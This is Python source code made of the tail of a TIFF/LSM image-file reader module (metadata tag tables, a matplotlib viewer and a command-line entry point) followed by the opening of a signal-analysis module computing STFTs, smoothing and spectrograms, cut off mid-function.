x-y 4: 'XYZTC', # time series x-z 5: 'XYTCZ', # time series 'Mean of ROIs' 6: 'XYZTC', # time series x-y-z 7: 'XYCTZ', # spline scan 8: 'XYCZT', # spline scan x-z 9: 'XYTCZ', # time series spline plane x-z 10: 'XYZCT', # point mode } # Map dimension codes to cz_lsm_info attribute CZ_DIMENSIONS = { 'X': 'dimension_x', 'Y': 'dimension_y', 'Z': 'dimension_z', 'C': 'dimension_channels', 'T': 'dimension_time', } # Description of cz_lsm_info.data_type CZ_DATA_TYPES = { 0: 'varying data types', 1: '8 bit unsigned integer', 2: '12 bit unsigned integer', 5: '32 bit float', } # Description of cz_lsm_info.type_of_data CZ_TYPE_OF_DATA = { 0: 'Original scan data', 1: 'Calculated data', 2: '3D reconstruction', 3: 'Topography height map', } CZ_LSM_SCAN_INFO_ARRAYS = { 0x20000000: "tracks", 0x30000000: "lasers", 0x60000000: "detection_channels", 0x80000000: "illumination_channels", 0xa0000000: "beam_splitters", 0xc0000000: "data_channels", 0x11000000: "timers", 0x13000000: "markers", } CZ_LSM_SCAN_INFO_STRUCTS = { # 0x10000000: "recording", 0x40000000: "track", 0x50000000: "laser", 0x70000000: "detection_channel", 0x90000000: "illumination_channel", 0xb0000000: "beam_splitter", 0xd0000000: "data_channel", 0x12000000: "timer", 0x14000000: "marker", } CZ_LSM_SCAN_INFO_ATTRIBUTES = { # recording 0x10000001: "name", 0x10000002: "description", 0x10000003: "notes", 0x10000004: "objective", 0x10000005: "processing_summary", 0x10000006: "special_scan_mode", 0x10000007: "scan_type", 0x10000008: "scan_mode", 0x10000009: "number_of_stacks", 0x1000000a: "lines_per_plane", 0x1000000b: "samples_per_line", 0x1000000c: "planes_per_volume", 0x1000000d: "images_width", 0x1000000e: "images_height", 0x1000000f: "images_number_planes", 0x10000010: "images_number_stacks", 0x10000011: "images_number_channels", 0x10000012: "linscan_xy_size", 0x10000013: "scan_direction", 0x10000014: "time_series", 0x10000015: "original_scan_data", 0x10000016: "zoom_x", 0x10000017: "zoom_y", 0x10000018: "zoom_z", 0x10000019: "sample_0x", 0x1000001a: "sample_0y", 0x1000001b: "sample_0z", 0x1000001c: "sample_spacing", 0x1000001d: "line_spacing", 0x1000001e: "plane_spacing", 0x1000001f: "plane_width", 0x10000020: "plane_height", 0x10000021: "volume_depth", 0x10000023: "nutation", 0x10000034: "rotation", 0x10000035: "precession", 0x10000036: "sample_0time", 0x10000037: "start_scan_trigger_in", 0x10000038: "start_scan_trigger_out", 0x10000039: "start_scan_event", 0x10000040: "start_scan_time", 0x10000041: "stop_scan_trigger_in", 0x10000042: "stop_scan_trigger_out", 0x10000043: "stop_scan_event", 0x10000044: "stop_scan_time", 0x10000045: "use_rois", 0x10000046: "use_reduced_memory_rois", 0x10000047: "user", 0x10000048: "use_bc_correction", 0x10000049: "position_bc_correction1", 0x10000050: "position_bc_correction2", 0x10000051: "interpolation_y", 0x10000052: "camera_binning", 0x10000053: "camera_supersampling", 0x10000054: "camera_frame_width", 0x10000055: "camera_frame_height", 0x10000056: "camera_offset_x", 0x10000057: "camera_offset_y", 0x10000059: "rt_binning", 0x1000005a: "rt_frame_width", 0x1000005b: "rt_frame_height", 0x1000005c: "rt_region_width", 0x1000005d: "rt_region_height", 0x1000005e: "rt_offset_x", 0x1000005f: "rt_offset_y", 0x10000060: "rt_zoom", 0x10000061: "rt_line_period", 0x10000062: "prescan", 0x10000063: "scan_direction_z", # track 0x40000001: "multiplex_type", # 0 after line; 1 after frame 0x40000002: "multiplex_order", 0x40000003: "sampling_mode", # 0 sample; 1 line average; 2 frame average 0x40000004: "sampling_method", # 1 mean; 2 sum 0x40000005: "sampling_number", 0x40000006: "acquire", 0x40000007: "sample_observation_time", 0x4000000b: "time_between_stacks", 0x4000000c: "name", 0x4000000d: "collimator1_name", 0x4000000e: "collimator1_position", 0x4000000f: "collimator2_name", 0x40000010: "collimator2_position", 0x40000011: "is_bleach_track", 0x40000012: "is_bleach_after_scan_number", 0x40000013: "bleach_scan_number", 0x40000014: "trigger_in", 0x40000015: "trigger_out", 0x40000016: "is_ratio_track", 0x40000017: "bleach_count", 0x40000018: "spi_center_wavelength", 0x40000019: "pixel_time", 0x40000021: "condensor_frontlens", 0x40000023: "field_stop_value", 0x40000024: "id_condensor_aperture", 0x40000025: "condensor_aperture", 0x40000026: "id_condensor_revolver", 0x40000027: "condensor_filter", 0x40000028: "id_transmission_filter1", 0x40000029: "id_transmission1", 0x40000030: "id_transmission_filter2", 0x40000031: "id_transmission2", 0x40000032: "repeat_bleach", 0x40000033: "enable_spot_bleach_pos", 0x40000034: "spot_bleach_posx", 0x40000035: "spot_bleach_posy", 0x40000036: "spot_bleach_posz", 0x40000037: "id_tubelens", 0x40000038: "id_tubelens_position", 0x40000039: "transmitted_light", 0x4000003a: "reflected_light", 0x4000003b: "simultan_grab_and_bleach", 0x4000003c: "bleach_pixel_time", # laser 0x50000001: "name", 0x50000002: "acquire", 0x50000003: "power", # detection_channel 0x70000001: "integration_mode", 0x70000002: "special_mode", 0x70000003: "detector_gain_first", 0x70000004: "detector_gain_last", 0x70000005: "amplifier_gain_first", 0x70000006: "amplifier_gain_last", 0x70000007: "amplifier_offs_first", 0x70000008: "amplifier_offs_last", 0x70000009: "pinhole_diameter", 0x7000000a: "counting_trigger", 0x7000000b: "acquire", 0x7000000c: "point_detector_name", 0x7000000d: "amplifier_name", 0x7000000e: "pinhole_name", 0x7000000f: "filter_set_name", 0x70000010: "filter_name", 0x70000013: "integrator_name", 0x70000014: "channel_name", 0x70000015: "detector_gain_bc1", 0x70000016: "detector_gain_bc2", 0x70000017: "amplifier_gain_bc1", 0x70000018: "amplifier_gain_bc2", 0x70000019: "amplifier_offset_bc1", 0x70000020: "amplifier_offset_bc2", 0x70000021: "spectral_scan_channels", 0x70000022: "spi_wavelength_start", 0x70000023: "spi_wavelength_stop", 0x70000026: "dye_name", 0x70000027: "dye_folder", # illumination_channel 0x90000001: "name", 0x90000002: "power", 0x90000003: "wavelength", 0x90000004: "aquire", 0x90000005: "detchannel_name", 0x90000006: "power_bc1", 0x90000007: "power_bc2", # beam_splitter 0xb0000001: "filter_set", 0xb0000002: "filter", 0xb0000003: "name", # data_channel 0xd0000001: "name", 0xd0000003: "acquire", 0xd0000004: "color", 0xd0000005: "sample_type", 0xd0000006: "bits_per_sample", 0xd0000007: "ratio_type", 0xd0000008: "ratio_track1", 0xd0000009: "ratio_track2", 0xd000000a: "ratio_channel1", 0xd000000b: "ratio_channel2", 0xd000000c: "ratio_const1", 0xd000000d: "ratio_const2", 0xd000000e: "ratio_const3", 0xd000000f: "ratio_const4", 0xd0000010: "ratio_const5", 0xd0000011: "ratio_const6", 0xd0000012: "ratio_first_images1", 0xd0000013: "ratio_first_images2", 0xd0000014: "dye_name", 0xd0000015: "dye_folder", 0xd0000016: "spectrum", 0xd0000017: "acquire", # timer 0x12000001: "name", 0x12000002: "description", 0x12000003: "interval", 0x12000004: "trigger_in", 0x12000005: "trigger_out", 0x12000006: "activation_time", 0x12000007: "activation_number", # marker 0x14000001: "name", 0x14000002: "description", 0x14000003: "trigger_in", 0x14000004: "trigger_out", } # Map TIFF tag code to attribute name, default value, type, count, validator TIFF_TAGS = { 254: ('new_subfile_type', 0, 4, 1, TIFF_SUBFILE_TYPES()), 255: ('subfile_type', None, 3, 1, {0: 'undefined', 1: 'image', 2: 'reduced_image', 3: 'page'}), 256: ('image_width', None, 4, 1, None), 257: ('image_length', None, 4, 1, None), 258: ('bits_per_sample', 1, 3, 1, None), 259: ('compression', 1, 3, 1, TIFF_COMPESSIONS), 262: ('photometric', None, 3, 1, TIFF_PHOTOMETRICS), 266: ('fill_order', 1, 3, 1, {1: 'msb2lsb', 2: 'lsb2msb'}), 269: ('document_name', None, 2, None, None), 270: ('image_description', None, 2, None, None), 271: ('make', None, 2, None, None), 272: ('model', None, 2, None, None), 273: ('strip_offsets', None, 4, None, None), 274: ('orientation', 1, 3, 1, TIFF_ORIENTATIONS), 277: ('samples_per_pixel', 1, 3, 1, None), 278: ('rows_per_strip', 2**32-1, 4, 1, None), 279: ('strip_byte_counts', None, 4, None, None), 280: ('min_sample_value', None, 3, None, None), 281: ('max_sample_value', None, 3, None, None), # 2**bits_per_sample 282: ('x_resolution', None, 5, 1, None), 283: ('y_resolution', None, 5, 1, None), 284: ('planar_configuration', 1, 3, 1, {1: 'contig', 2: 'separate'}), 285: ('page_name', None, 2, None, None), 286: ('x_position', None, 5, 1, None), 287: ('y_position', None, 5, 1, None), 296: ('resolution_unit', 2, 4, 1, {1: 'none', 2: 'inch', 3: 'centimeter'}), 297: ('page_number', None, 3, 2, None), 305: ('software', None, 2, None, None), 306: ('datetime', None, 2, None, None), 315: ('artist', None, 2, None, None), 316: ('host_computer', None, 2, None, None), 317: ('predictor', 1, 3, 1, {1: None, 2: 'horizontal'}), 318: ('white_point', None, 5, 2, None), 319: ('primary_chromaticities', None, 5, 6, None), 320: ('color_map', None, 3, None, None), 322: ('tile_width', None, 4, 1, None), 323: ('tile_length', None, 4, 1, None), 324: ('tile_offsets', None, 4, None, None), 325: ('tile_byte_counts', None, 4, None, None), 338: ('extra_samples', None, 3, None, {0: 'unspecified', 1: 'assocalpha', 2: 'unassalpha'}), 339: ('sample_format', 1, 3, 1, TIFF_SAMPLE_FORMATS), 340: ('smin_sample_value', None, None, None, None), 341: ('smax_sample_value', None, None, None, None), 347: ('jpeg_tables', None, 7, None, None), 530: ('ycbcr_subsampling', 1, 3, 2, None), 531: ('ycbcr_positioning', 1, 3, 1, None), 32996: ('sgi_matteing', None, None, 1, None), # use extra_samples 32996: ('sgi_datatype', None, None, 1, None), # use sample_format 32997: ('image_depth', None, 4, 1, None), 32998: ('tile_depth', None, 4, 1, None), 33432: ('copyright', None, 1, None, None), 33445: ('md_file_tag', None, 4, 1, None), 33446: ('md_scale_pixel', None, 5, 1, None), 33447: ('md_color_table', None, 3, None, None), 33448: ('md_lab_name', None, 2, None, None), 33449: ('md_sample_info', None, 2, None, None), 33450: ('md_prep_date', None, 2, None, None), 33451: ('md_prep_time', None, 2, None, None), 33452: ('md_file_units', None, 2, None, None), 33550: ('model_pixel_scale', None, 12, 3, None), 33922: ('model_tie_point', None, 12, None, None), 34665: ('exif_ifd', None, None, 1, None), 34735: ('geo_key_directory', None, 3, None, None), 34736: ('geo_double_params', None, 12, None, None), 34737: ('geo_ascii_params', None, 2, None, None), 34853: ('gps_ifd', None, None, 1, None), 37510: ('user_comment', None, None, None, None), 42112: ('gdal_metadata', None, 2, None, None), 42113: ('gdal_nodata', None, 2, None, None), 50289: ('mc_xy_position', None, 12, 2, None), 50290: ('mc_z_position', None, 12, 1, None), 50291: ('mc_xy_calibration', None, 12, 3, None), 50292: ('mc_lens_lem_na_n', None, 12, 3, None), 50293: ('mc_channel_name', None, 1, None, None), 50294: ('mc_ex_wavelength', None, 12, 1, None), 50295: ('mc_time_stamp', None, 12, 1, None), 50838: ('imagej_byte_counts', None, None, None, None), 65200: ('flex_xml', None, 2, None, None), # code: (attribute name, default value, type, count, validator) } # Map custom TIFF tag codes to attribute names and import functions CUSTOM_TAGS = { 700: ('xmp', read_bytes), 34377: ('photoshop', read_numpy), 33723: ('iptc', read_bytes), 34675: ('icc_profile', read_bytes), 33628: ('uic1tag', read_uic1tag), # Universal Imaging Corporation STK 33629: ('uic2tag', read_uic2tag), 33630: ('uic3tag', read_uic3tag), 33631: ('uic4tag', read_uic4tag), 34361: ('mm_header', read_mm_header), # Olympus FluoView 34362: ('mm_stamp', read_mm_stamp), 34386: ('mm_user_block', read_bytes), 34412: ('cz_lsm_info', read_cz_lsm_info), # Carl Zeiss LSM 43314: ('nih_image_header', read_nih_image_header), # 40001: ('mc_ipwinscal', read_bytes), 40100: ('mc_id_old', read_bytes), 50288: ('mc_id', read_bytes), 50296: ('mc_frame_properties', read_bytes), 50839: ('imagej_metadata', read_bytes), 51123: ('micromanager_metadata', read_json), } # Max line length of printed output PRINT_LINE_LEN = 79 def imshow(data, title=None, vmin=0, vmax=None, cmap=None, bitspersample=None, photometric='rgb', interpolation='nearest', dpi=96, figure=None, subplot=111, maxdim=8192, **kwargs): """Plot n-dimensional images using matplotlib.pyplot. Return figure, subplot and plot axis. Requires pyplot already imported ``from matplotlib import pyplot``. Parameters ---------- bitspersample : int or None Number of bits per channel in integer RGB images. photometric : {'miniswhite', 'minisblack', 'rgb', or 'palette'} The color space of the image data. title : str Window and subplot title. figure : matplotlib.figure.Figure (optional). Matplotlib to use for plotting. subplot : int A matplotlib.pyplot.subplot axis. maxdim : int maximum image size in any dimension. kwargs : optional Arguments for matplotlib.pyplot.imshow. """ #if photometric not in ('miniswhite', 'minisblack', 'rgb', 'palette'): # raise ValueError("Can't handle %s photometrics" % photometric) # TODO: handle photometric == 'separated' (CMYK) isrgb = photometric in ('rgb', 'palette') data = numpy.atleast_2d(data.squeeze()) data = data[(slice(0, maxdim), ) * len(data.shape)] dims = data.ndim if dims < 2: raise ValueError("not an image") elif dims == 2: dims = 0 isrgb = False else: if isrgb and data.shape[-3] in (3, 4): data = numpy.swapaxes(data, -3, -2) data = numpy.swapaxes(data, -2, -1) elif not isrgb and (data.shape[-1] < data.shape[-2] // 16 and data.shape[-1] < data.shape[-3] // 16 and data.shape[-1] < 5): data = numpy.swapaxes(data, -3, -1) data = numpy.swapaxes(data, -2, -1) isrgb = isrgb and data.shape[-1] in (3, 4) dims -= 3 if isrgb else 2 if photometric == 'palette' and isrgb: datamax = data.max() if datamax > 255: data >>= 8 # possible precision loss data = data.astype('B') elif data.dtype.kind in 'ui': if not (isrgb and data.dtype.itemsize <= 1) or bitspersample is None: try: bitspersample = int(math.ceil(math.log(data.max(), 2))) except Exception: bitspersample = data.dtype.itemsize * 8 elif not isinstance(bitspersample, int): # bitspersample can be tuple, e.g. (5, 6, 5) bitspersample = data.dtype.itemsize * 8 datamax = 2**bitspersample if isrgb: if bitspersample < 8: data <<= 8 - bitspersample elif bitspersample > 8: data >>= bitspersample - 8 # precision loss data = data.astype('B') elif data.dtype.kind == 'f': datamax = data.max() if isrgb and datamax > 1.0: if data.dtype.char == 'd': data = data.astype('f') data /= datamax elif data.dtype.kind == 'b': datamax = 1 elif data.dtype.kind == 'c': raise NotImplementedError("complex type") # TODO: handle complex types if not isrgb: if vmax is None: vmax = datamax if vmin is None: if data.dtype.kind == 'i': dtmin = numpy.iinfo(data.dtype).min vmin = numpy.min(data) if vmin == dtmin: vmin = numpy.min(data > dtmin) if data.dtype.kind == 'f': dtmin = numpy.finfo(data.dtype).min vmin = numpy.min(data) if vmin == dtmin: vmin = numpy.min(data > dtmin) else: vmin = 0 pyplot = sys.modules['matplotlib.pyplot'] if figure is None: pyplot.rc('font', family='sans-serif', weight='normal', size=8) figure = pyplot.figure(dpi=dpi, figsize=(10.3, 6.3), frameon=True, facecolor='1.0', edgecolor='w') try: figure.canvas.manager.window.title(title) except Exception: pass pyplot.subplots_adjust(bottom=0.03*(dims+2), top=0.9, left=0.1, right=0.95, hspace=0.05, wspace=0.0) subplot = pyplot.subplot(subplot) if title: try: title = unicode(title, 'Windows-1252') except TypeError: pass pyplot.title(title, size=11) if cmap is None: if data.dtype.kind in 'ubf' or vmin == 0: cmap = 'cubehelix' else: cmap = 'coolwarm' if photometric == 'miniswhite': cmap += '_r' image = pyplot.imshow(data[(0, ) * dims].squeeze(), vmin=vmin, vmax=vmax, cmap=cmap, interpolation=interpolation, **kwargs) if not isrgb: pyplot.colorbar() # panchor=(0.55, 0.5), fraction=0.05 def format_coord(x, y): # callback function to format coordinate display in toolbar x = int(x + 0.5) y = int(y + 0.5) try: if dims: return "%s @ %s [%4i, %4i]" % (cur_ax_dat[1][y, x], current, x, y) else: return "%s @ [%4i, %4i]" % (data[y, x], x, y) except IndexError: return "" pyplot.gca().format_coord = format_coord if dims: current = list((0, ) * dims) cur_ax_dat = [0, data[tuple(current)].squeeze()] sliders = [pyplot.Slider( pyplot.axes([0.125, 0.03*(axis+1), 0.725, 0.025]), 'Dimension %i' % axis, 0, data.shape[axis]-1, 0, facecolor='0.5', valfmt='%%.0f [%i]' % data.shape[axis]) for axis in range(dims)] for slider in sliders: slider.drawon = False def set_image(current, sliders=sliders, data=data): # change image and redraw canvas cur_ax_dat[1] = data[tuple(current)].squeeze() image.set_data(cur_ax_dat[1]) for ctrl, index in zip(sliders, current): ctrl.eventson = False ctrl.set_val(index) ctrl.eventson = True figure.canvas.draw() def on_changed(index, axis, data=data, current=current): # callback function for slider change event index = int(round(index)) cur_ax_dat[0] = axis if index == current[axis]: return if index >= data.shape[axis]: index = 0 elif index < 0: index = data.shape[axis] - 1 current[axis] = index set_image(current) def on_keypressed(event, data=data, current=current): # callback function for key press event key = event.key axis = cur_ax_dat[0] if str(key) in '0123456789': on_changed(key, axis) elif key == 'right': on_changed(current[axis] + 1, axis) elif key == 'left': on_changed(current[axis] - 1, axis) elif key == 'up': cur_ax_dat[0] = 0 if axis == len(data.shape)-1 else axis + 1 elif key == 'down': cur_ax_dat[0] = len(data.shape)-1 if axis == 0 else axis - 1 elif key == 'end': on_changed(data.shape[axis] - 1, axis) elif key == 'home': on_changed(0, axis) figure.canvas.mpl_connect('key_press_event', on_keypressed) for axis, ctrl in enumerate(sliders): ctrl.on_changed(lambda k, a=axis: on_changed(k, a)) return figure, subplot, image def _app_show(): """Block the GUI. For use as skimage plugin.""" pyplot = sys.modules['matplotlib.pyplot'] pyplot.show() def main(argv=None): """Command line usage main function.""" if float(sys.version[0:3]) < 2.6: print("This script requires Python version 2.6 or better.") print("This is Python version %s" % sys.version) return 0 if argv is None: argv = sys.argv import optparse parser = optparse.OptionParser( usage="usage: %prog [options] path", description="Display image data in TIFF files.", version="%%prog %s" % __version__) opt = parser.add_option opt('-p', '--page', dest='page', type='int', default=-1, help="display single page") opt('-s', '--series', dest='series', type='int', default=-1, help="display series of pages of same shape") opt('--nomultifile', dest='nomultifile', action='store_true', default=False, help="don't read OME series from multiple files") opt('--noplot', dest='noplot', action='store_true', default=False, help="don't display images") opt('--interpol', dest='interpol', metavar='INTERPOL', default='bilinear', help="image interpolation method") opt('--dpi', dest='dpi', type='int', default=96, help="set plot resolution") opt('--debug', dest='debug', action='store_true', default=False, help="raise exception on failures") opt('--test', dest='test', action='store_true', default=False, help="try read all images in path") opt('--doctest', dest='doctest', action='store_true', default=False, help="runs the docstring examples") opt('-v', '--verbose', dest='verbose', action='store_true', default=True) opt('-q', '--quiet', dest='verbose', action='store_false') settings, path = parser.parse_args() path = ' '.join(path) if settings.doctest: import doctest doctest.testmod() return 0 if not path: parser.error("No file specified") if settings.test: test_tifffile(path, settings.verbose) return 0 if any(i in path for i in '?*'): path = glob.glob(path) if not path: print('no files match the pattern') return 0 # TODO: handle image sequences #if len(path) == 1: path = path[0] print("Reading file structure...", end=' ') start = time.time() try: tif = TiffFile(path, multifile=not settings.nomultifile) except Exception as e: if settings.debug: raise else: print("\n", e) sys.exit(0) print("%.3f ms" % ((time.time()-start) * 1e3)) if tif.is_ome: settings.norgb = True images = [(None, tif[0 if settings.page < 0 else settings.page])] if not settings.noplot: print("Reading image data... ", end=' ') def notnone(x): return next(i for i in x if i is not None) start = time.time() try: if settings.page >= 0: images = [(tif.asarray(key=settings.page), tif[settings.page])] elif settings.series >= 0: images = [(tif.asarray(series=settings.series), notnone(tif.series[settings.series].pages))] else: images = [] for i, s in enumerate(tif.series): try: images.append( (tif.asarray(series=i), notnone(s.pages))) except ValueError as e: images.append((None, notnone(s.pages))) if settings.debug: raise else: print("\n* series %i failed: %s... " % (i, e), end='') print("%.3f ms" % ((time.time()-start) * 1e3)) except Exception as e: if settings.debug: raise else: print(e) tif.close() print("\nTIFF file:", tif) print() for i, s in enumerate(tif.series): print ("Series %i" % i) print(s) print() for i, page in images: print(page) print(page.tags) if page.is_palette: print("\nColor Map:", page.color_map.shape, page.color_map.dtype) for attr in ('cz_lsm_info', 'cz_lsm_scan_info', 'uic_tags', 'mm_header', 'imagej_tags', 'micromanager_metadata', 'nih_image_header'): if hasattr(page, attr): print("", attr.upper(), Record(getattr(page, attr)), sep="\n") print() if page.is_micromanager: print('MICROMANAGER_FILE_METADATA') print(Record(tif.micromanager_metadata)) if images and not settings.noplot: try: import matplotlib matplotlib.use('TkAgg') from matplotlib import pyplot except ImportError as e: warnings.warn("failed to import matplotlib.\n%s" % e) else: for img, page in images: if img is None: continue vmin, vmax = None, None if 'gdal_nodata' in page.tags: try: vmin = numpy.min(img[img > float(page.gdal_nodata)]) except ValueError: pass if page.is_stk: try: vmin = page.uic_tags['min_scale'] vmax = page.uic_tags['max_scale'] except KeyError: pass else: if vmax <= vmin: vmin, vmax = None, None title = "%s\n %s" % (str(tif), str(page)) imshow(img, title=title, vmin=vmin, vmax=vmax, bitspersample=page.bits_per_sample, photometric=page.photometric, interpolation=settings.interpol, dpi=settings.dpi) pyplot.show() TIFFfile = TiffFile # backwards compatibility if sys.version_info[0] > 2: basestring = str, bytes unicode = str if __name__ == "__main__": sys.exit(main())
# -*- coding: utf-8 -*- # Copyright (c) 2013-2016 The siganalysis developers. All rights reserved. # Project site: https://github.com/questrail/siganalysis # Use of this source code is governed by a MIT-style license that # can be found in the LICENSE.txt file for the project. """Provide Python routines for signal analysis Provide various analysis routines required for analyzing signals in Python, such as calculating a Short-Time Fourier Transform, plotting an STFT's spectrogram, calculating the peak hold values for an STFT, etc. """ # Try to future proof code so that it's Python 3.x ready from __future__ import print_function from __future__ import unicode_literals from __future__ import division from __future__ import absolute_import # Numerical analysis related imports import numpy as np import scipy import matplotlib.pyplot as plt __version__ = '0.4.0' def time_slice_zip(number_of_samples, samples_per_time_slice): """Create a zipped list of tuples for time slicing a numpy array When dealing with large numpy arrays containing time series data, it is often desirable to time slice the data on a fixed duration, such as one minute. This function creates a list of tuples (similar to the Python zip function) to iterate through a numpy array using slices. Args: number_of_samples: Number of samples in the time series numpy array samples_per_time_slice: Desired number of samples per time slice not including the last time slice which will be limited to the length of the time series Returns: A list of tuples that can be used to time slice the data. """ current_index = 0 zipped = [] while current_index < (number_of_samples - samples_per_time_slice): this_tuple = current_index, current_index + samples_per_time_slice zipped.append(this_tuple) current_index += samples_per_time_slice zipped.append((current_index, number_of_samples)) return zipped def stft(input_data, sampling_frequency_hz, frame_size_sec, hop_size_sec, use_hamming_window=True): """Calculates the Short Time Fourier Transform Using code based on http://stackoverflow.com/a/6891772/95592 calculate the STFT. Args: input_data: A 1D numpy ndarray containing the signal in the time domain that will be converted to the freq domain via STFT. sampling_frequency_hz: Sampling frequency originally used to capture the input_data frame_size_sec: Frame size given in seconds. The frame size determines how long each FFT will be in the time domain. hop_size_sec: Hop size given in seconds. The hop size is the time by which the frame should be shifted forward for the next FFT. It is not uncommon for this to be less than the frame size so that there is some amount of overlap. use_hamming_window: A Boolean indicating if the Hamming window should be used when performing the FFT. Using a Hamming window helps. Returns: A tuple containing: 1. A 2D numpy ndarray providing the amplitude of the STFT with respect to the frequency and time having a shape of (time, freq). This array is trimmed to be single-sided instead of returning the double-sided FFT, and it is normalized by 2/N where N is the length of the frequency domain info. The DC component is not multiplied by 2 though, it is just normalized by 1/N. 2. A 1D numpy ndarray [shape = (time,)] containing the time in seconds for each value in the stft_data along the time axis. 3. A 1D numpy ndarray [shape = (freq,)] containing the freq in Hz for each value in the stft_data along the frequency axis. 4. A float indicating the frequency bin size in Hz or what is also referred to as the frequency domain step size (not to be confused with or equal to the sampling frequency). """ num_frame_samples = int(frame_size_sec * sampling_frequency_hz) num_hop_samples = int(hop_size_sec * sampling_frequency_hz) if (use_hamming_window): x = np.array([ scipy.fft( 2 * scipy.hamming(num_frame_samples) * input_data[i:i+num_frame_samples]) for i in range( 0, len(input_data)-num_frame_samples, num_hop_samples)]) else: x = np.array([ scipy.fft(input_data[i:i+num_frame_samples]) for i in range( 0, len(input_data)-num_frame_samples, num_hop_samples)]) # Normalize the FFT results # See "Description and Application of Fourier Transforms and Fourier # Series" rev A05 by Matthew Rankin for a description on why the # normalization is 2 / N except for the DC component which is 1 / N # Only deal with the single-sided FFT, so cut it in half x = x[:, :num_frame_samples//2] # Convert from complex to absolute values x = np.abs(x) # Divide all components by the num_frame_samples # Multiply all but the DC component by 2 non_dc_normalization = 2 / num_frame_samples x[:, 1:] = x[:, 1:] * non_dc_normalization x[:, 0] = x[:, 0] / num_frame_samples # Create the time vector # FIXME(mdr): Need to add test to make sure this is correctly calculated. # Might want to refactor into separate function. time_vector_stft = np.linspace( 0, (x.shape[0] - 1) * hop_size_sec, x.shape[0]) # Calculate the width of each frequency bin hz_per_freq_bin = sampling_frequency_hz / num_frame_samples # Create the frequency vector freq_vector_stft = np.arange(x.shape[1]) * hz_per_freq_bin return (x, time_vector_stft, freq_vector_stft, hz_per_freq_bin) def hz2khz(frequency_in_hz): """Convert from Hz to kHz Args: frequency_in_hz: A float containing the frequency value in Hz that is to be converted. Return: The frequency in kHz. """ return frequency_in_hz / 1000 def smooth(x, window_len=11, window='hanning'): """smooth the data using a window with requested size. cookb_signalsmooth.py from: http://scipy.org/Cookbook/SignalSmooth This method is based on the convolution of a scaled window with the signal. The signal is prepared by introducing reflected copies of the signal (with the window size) in both ends so that transient parts are minimized in the begining and end part of the output signal. Args: x: The input signal to be smoothed window_len: the dimension of the smoothing window window: The type of window from 'flat', 'hanning', 'hamming', 'bartlett', 'blackman' flat window will produce a moving average smoothing. Returns: the smoothed signal example: import numpy as np t = np.linspace(-2,2,0.1) x = np.sin(t)+np.random.randn(len(t))*0.1 y = smooth(x) see also: numpy.hanning, numpy.hamming, numpy.bartlett, numpy.blackman, numpy.convolve, scipy.signal.lfilter """ if x.ndim != 1: raise ValueError('Function smooth only accepts 1D arrays.') if x.size < window_len: raise IndexError('Input vector needs to be bigger than window size.') if window_len < 3: return x if window_len & 1: pass else: window_len += 1 if window not in ['flat', 'hanning', 'hamming', 'bartlett', 'blackman']: raise ValueError("Window must be one of: 'flat', 'hanning', " "'hamming', 'bartlett', 'blackman'") s = np.r_[x[window_len-1:0:-1], x, x[-1:-window_len:-1]] if window == 'flat': w = np.ones(window_len, 'd') else: w = eval('np.' + window + '(window_len)') y = np.convolve(w/w.sum(), s, mode='valid') samples_to_strip = (window_len - 1) / 2 return y[samples_to_strip:len(y)-samples_to_strip] def smooth2(x, beta=3, window_len=11): """Smooth function using Kaiser window Args: x: ndarray containing the signal to be smoothed beta: beta to use as part of the Kaiser smoothing window_len: Integer length of window to be used in Kaiser smoothing, which must be odd or it will be made odd. Returns: An ndarrary containing the smoothed signal. """ # If window_len is not odd, add one so that it is odd if window_len & 1: pass else: window_len += 1 s = np.r_[x[window_len-1:0:-1], x, x[-1:-window_len:-1]] w = np.kaiser(window_len, beta) y = np.convolve(w/w.sum(), s, mode='valid') samples_to_strip = (window_len - 1) / 2 return y[samples_to_strip:len(y)-samples_to_strip] def calculate_peak_hold(stft_data, frequency_array): """Calculate the peak hold for a given STFT dataset. Args: stft_data: A 2D numpy ndarray with shape (time, freq) containing the amplitude vs freq vs time. frequency_array: A 1d numpy ndarray containing the frequencies for the stft_data. Returns: peak_hold: A 1D numpy structured array containing the frequency and amplitude with the dtype [(freq, amp)] Raises: ValueError: The frequency_array and stft_data[1] are not the same length. """ if frequency_array.size != stft_data.shape[1]: raise IndexError('The size of the frequency_array does not match ' 'the STFT data.') data_type = np.dtype([('frequency', 'f8'), ('amplitude', 'f8')]) peak_hold = np.zeros(frequency_array.size, dtype=data_type) peak_hold['frequency'] = frequency_array peak_hold['amplitude'] = np.amax(stft_data, axis=0) return peak_hold def plot_spectrogram(stft_data, time_vector, freq_vector, plot_axis, freq_plot_range=False, time_plot_range=False, plot_title=False, plot_xlabel=False, plot_ylabel=False, colorbar_label=False, colorbar_fontsize=8): """Create a spectrogram plot Take a numpy ndarray containing amplitude vs. frequency vs. time info and create a spectrogram. Currently, this assumes that the stft_data starts at 0 Hz and uses the given hz_per_freq_bin. It would be better if I passed in a freq array similar to the time_array that is passed. Args: stft_data: A 2D numpy ndarray of shape (time, freq) containing the amplitude over both freq and time. time_vector: A 1d numpy ndarray containing the time in seconds for each value in the stft_data along the time axis. time_vector is assumed to be sorted and to contain equal time steps. freq_vector: A 1d numpy ndarray containing the freq in Hz for each value in the stft_data along the frequency axis. freq_vector is assumed to be sorted and to contain equal frequency steps. plot_axis: matplotlip axis that this plot should be added to freq_plot_range: A tuple containing the start and stop frequency in Hz for the spectrogram plot (frequencies are inclusive) time_plot_range: A tuple containing the start and stop time in seconds for the spectrogram plot (time are inclusive) plot_title: An optional string with the plot title plot_xlabel: An optional string with the x-axis label plot_ylabel: An optional string with the y-axis label colorbar_label: An optional string with the label to be added to the colorbar. If excluded then the colorbar is not plotted. colorbar_fontsize: Integer of the colorbar font size. Returns: matplolib handle to the spectrogram """ if freq_plot_range is False: start_freq_plot = freq_vector[0] stop_freq_plot = freq_vector[-1] else: start_freq_plot, stop_freq_plot = freq_plot_range # FIXME: Is there an error in the time plot range or the calculation of the # start and stop time bins? if time_plot_range is False: start_time_plot = time_vector[0] stop_time_plot = time_vector[-1] else: start_time_plot, stop_time_plot = time_plot_range # Calculate the hz_per_freq_bin assuming that the frequency steps are # equal. hz_per_freq_bin = freq_vector[1] - freq_vector[0] sec_per_time_bin = time_vector[1] - time_vector[0] # Determine the frequency bins for the start and stop freqs start_freq_bin = int((start_freq_plot - freq_vector[0]) / hz_per_freq_bin) stop_freq_bin = int((stop_freq_plot - freq_vector[0]) / hz_per_freq_bin) start_time_bin = int((start_time_plot - time_vector[0]) / sec_per_time_bin) stop_time_bin = int((stop_time_plot - time_vector[0]) / sec_per_time_bin) # Create the spectrogram spectrogram = plot_axis.imshow( 